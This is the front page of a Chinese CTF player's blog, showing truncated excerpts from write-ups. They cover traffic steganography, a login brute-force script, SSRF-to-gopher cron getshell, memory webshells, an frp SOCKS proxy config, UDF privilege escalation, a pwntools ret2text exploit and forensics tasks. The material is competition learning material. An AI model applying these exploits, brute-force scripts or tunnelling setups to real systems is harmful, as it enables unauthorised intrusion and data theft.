St4rr's Blog

在这个AI能杀穿CTF的时代怀着不知道出什么题好的心理且同时还得给NCTF出题的情况下出了个musc签到题() 可以看到流量包后面还跟着一个压缩包，提取出来 image-20260208152146156 可以看出压缩包中的so_ez是一个sslkeylog image-20260208152237659 导入wireshark解密流量 image-20260208152337700 可以看到流量中有大量的HTTP2请求，仔细观察可以发现，其中WINDOW_UPDATE帧的Window Size Increment字段的值总是65536或65537 image-20260208152741697 image-20260208152800713 将65536记作0，65537记作1，可提取出一个字符串，即为压缩包密码 1234567891011121314151617181920212223242526272829303132333435363738394041424344454647484950 ...

Gitdwn先扫 登录口可以爆破密码，根据login.js的加密逻辑写一个脚本 1234567891011121314151617181920212223242526272829303132333435363738394041424344454647484950515253545556575859606162636465666768697071727374757677import requestsimport jsonimport base64from Crypto.Cipher import AES, PKCS1_v1_5from Crypto.PublicKey import RSAfrom Crypto.Util.Padding import padfrom Crypto.Random import get_random_bytesTARGET_URL = "http://192.168.79.214/api/login.php"USERNAME = "admin"DICTIONARY_FILE = "D:\\tools\\di ...

web1flag1SSRF，通过file任意文件读取 flag2抓包用dict协议探测出内网另一台主机ip 通过gopher协议写定时任务getshell 直接读取/dump.rdb flag3flag在根目录下 web2flag1写内存马 蚁剑连上找到flag flag2蚁剑上传文件好像有点问题，后面用了冰蝎 搭建frp frpc.ini 12345678[common]server_addr = 60.204.245.37server_port = 7000[socks_proxy]type = tcpremote_port =6000plugin = socks5 frps.ini 12[common]bindPort = 7000 查看jdbc的配置，获取SerializedSystemIni.dat和密码的密文 用工具解密得到密码明文 navicat连接上在data表中找到flag flag3MUDT连接上，UDF提权后找到根目录下的flag flag4（未解出） 一点思考：怀疑题目本意是mysql服务器上进行udf提权，因为/ ...

较今昔以观进退，对前后而察盈虚。 2024年度总结传送门 导语又打了一年CTF，跟着校队或联队的大佬们拿了些奖，走过了不少城市，面基了好些师傅。 去年总结结语中的期望虽不敢说圆满完成，但也是完成了大半:) 这一年又学到了很多，也在慢慢走向实战，目前感觉CTF还是和实战有比较大的差距的() 在网安的道路上，我仍然只是初窥门径。仰之弥高，钻之弥坚。 接下来依旧按月份列一下这一年的历程吧 1月西湖论剑初赛wp: 点我 当时菜炸了，没能进决赛( 印象比较深的是这个比赛有个零解misc，CS流量分析出现了需要自己去手撕pem然后算RSA得到私钥的骚操作。当时愣是没想到会这样考（ RDCTFwp: 点我 学弟Sean爷参与出题的比赛，欣然前往参与捧场 :) 当时打到了第一名，由于不是新生所以不能拿奖，但是免考拿了一张NISP一级证书（但是仍然要交钱，真***贵啊） 美赛跟着原来学院的学长打的，负责编程，由于基本什么都不懂所以纯属被带着跑orzorzorz 拿了个S奖（（ 2月HGamewp: 点我 比赛的题目质量依旧不错的，可惜时间原因今年就只看了两周 VNCTFwp: 点我 记得当时是被 ...

时隔一年多又来打国赛了() 初赛Writeup点我初赛还和期末考试冲突了，为了搞缓考材料给我跑似了(( 依旧是和同届的几位神组的队，按名次来看应该是能进线下，希望这次能拿个好一点的成绩吧()

仍然是只做了一点点misc，校队的师傅们还是tql，又被带进线下了orzorzorz writeup点我

虽然是个小比赛，但是怀着去年因为差了一点没能拿到奖的执念今年又来打了(( 第十名，极限拿奖() 不得不说现在AI太好用了() OSINTLake这哪是lake 找到一座一样的房子，在英国的滨海绍森德 查到这个地方海拔差不多12左右 HSCCTF{51.5410, 0.6431,12} Pwnpwn164位ret2text 123456from pwn import *io=remote("150.138.81.18",13314)io.recvuntil(b"Enter your input: ")io.sendline(b'A'*72+p64(0x4011EC))io.interactive()#HSCCTF{1fbe1436-0fdf-4105-b4fa-846720bd0715} pwn3格式化字符串漏洞 手动尝试%21$s过了 ReverseSignida mcp还是太好用了 先看下apk的主函数，发现得去看下lib 直接交给mcp分析，得知这里就是个aes-ecb解密，密钥 ...

跟校队大手子们打的，又被带飞了，混进决赛了）orzorzorz wp赛后一小时狂赶，比较草，直接贴这了（ Misc水果图片后藏压缩包 看到提示oursecret，用oursecret对压缩包提取，猜测密码为shuiguo 压缩包中的oursecret解出来刚好16行，所以应该是吧它当作字典，对flag.txt中的每一行去其中查找行号0-f，得到一个hex字符串，然后from hex 12345678910111213141516171819202122232425262728293031323334# -*- coding: utf-8 -*-def main(): # 读取 OurSecret.txt 的所有行，去除末尾换行符 with open('OurSecret.txt', 'r', encoding='utf-8') as f: secret_lines = [line.rstrip('\n') for line in f.readlines()] # 构建 ...

不会的还是太多了，根据网上佬们的wp好好复现一下吧 （又来吃百家饭了） 手机取证1分析手机镜像，请问机身的Wi-Fi 信号源的物理地址是什么？[标准格式:01:02:03:04:05:06] 在/misc/wifi/WifiConfigStore.xml中可找到 00:db:60:6e:86:13 2分析手机镜像，请问张大的手机号码尾号是3807的手机号码是多少？[标准格式：15599005009] 全局搜索 15680193807 3分析手机镜像，分析手机镜像，其通讯录中号码归属地最多的直辖市是哪里？[标准格式：天津市] 排个序不难发现明显北京市最多 北京市 4分析手机镜像，嫌疑人最近卸载过的的一款小说APP的名字是什么？[标准格式：com.tencent.mm] 查看包的缓存/system/package_cache/1，找到有个com.kmxs.reader未在APP列表中出现 七猫免费小说 5分析手机镜像，嫌疑人使用“逐浪小说”应用最近一次搜索小说书名叫什么？[标准格式：斗破苍穹] 可以看到手机上有个小黄 ...

又是拖队友后腿的一集，给磕了orzorzorz 现在根据网上有的一些答案复现一下吧，以及记录一些题我的做法，争取下次不再拖后腿了orzorzorz 由于至今不会逆向，“ APK程序分析 ”“ 二进制程序分析”两部分就不复现了（（ “数据分析”部分也不复现了，做这部分题全靠AI（ 服务器取证重建服务器集群将四个镜像分别仿真起来，然后配到192.168.50.*的网段下 查看所有pod 访问kubernetes的dashboard 1kubectl create token dashboard-admin --namespace kube-system 获取到token，登录进去，看到pods是有问题的状态 去第四台机器上关一下防火墙 1systemctl stop firewalld redis活了 master上有mysql80的配置文件，可从中得知存储目录叫mysql80 可以在第四台机器上通过暴力搜索mysql80这个文件夹找到/data/k8s_data/default/mysql80，数据还在，因此我们创建一下pod ...